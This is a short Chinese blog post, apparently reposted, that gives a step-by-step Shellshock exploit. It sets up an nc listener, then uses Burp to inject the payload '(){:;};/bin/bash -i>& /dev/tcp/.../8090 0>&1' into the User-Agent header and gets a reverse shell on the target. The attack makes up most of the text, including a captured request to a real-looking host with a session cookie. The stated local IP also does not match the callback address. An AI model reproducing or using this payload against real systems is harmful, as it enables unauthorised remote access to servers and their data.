我喜欢SEO、网络营销及建站,希望与志同道合的您
建立合作或相互学习关系 QQ:10343829

通过 Bash 进行远程命令执行(也称为 Shellshock,也称为 Bashdoor)Bashdoor)

appscan 发现此漏洞,查找资料后总结如下:

1.  nc 建立本地监听

nc -l -p 8090   //-l的意思是使用监听模式,管控传入的资料。  -p 则是指定端口。

本机ip地址为  192.168.226.130 ,那么payload就是

(){:;};/bin/bash -i>& /dev/tcp/172.16.11.2/8090 0>&1;    // 这里就是要使用的payload

2. 查看burp的代理地址为 127.0.0.1  8080,将浏览器代理设置为 127.0.0.1  8080

3. 开始抓包,抓到的数据包为:

GET /index.php/mobile/user/index.htmlui-dir/testurl HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: http://www.xxxxxx.com/index.php/mobile/user/index.html
Cookie: think_lang=zh-cn; PHPSESSID=13e10c6d4324da569ec78a3fffb964ed
Host: a1.8hlj5hlj.cn
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US

将上面数据包的User-Agent在brup中改为:

User-Agent:(){:;};/bin/bash -i>& /dev/tcp/172.16.11.2/8090 0>&1;

4. 点击Forward释放修改后,释放包,就可以看到,成功的获取了目标机器的权限,反弹回一个Shell。

本文摘菜自: https://blog.csdn.net/whatiwhere/article/details/84777674  如有侵权,请联系删除。

转载请著名来源:天天小站 » 通过 Bash 进行远程命令执行(也称为 Shellshock,也称为 Bashdoor)Bashdoor)

分享到:更多 ()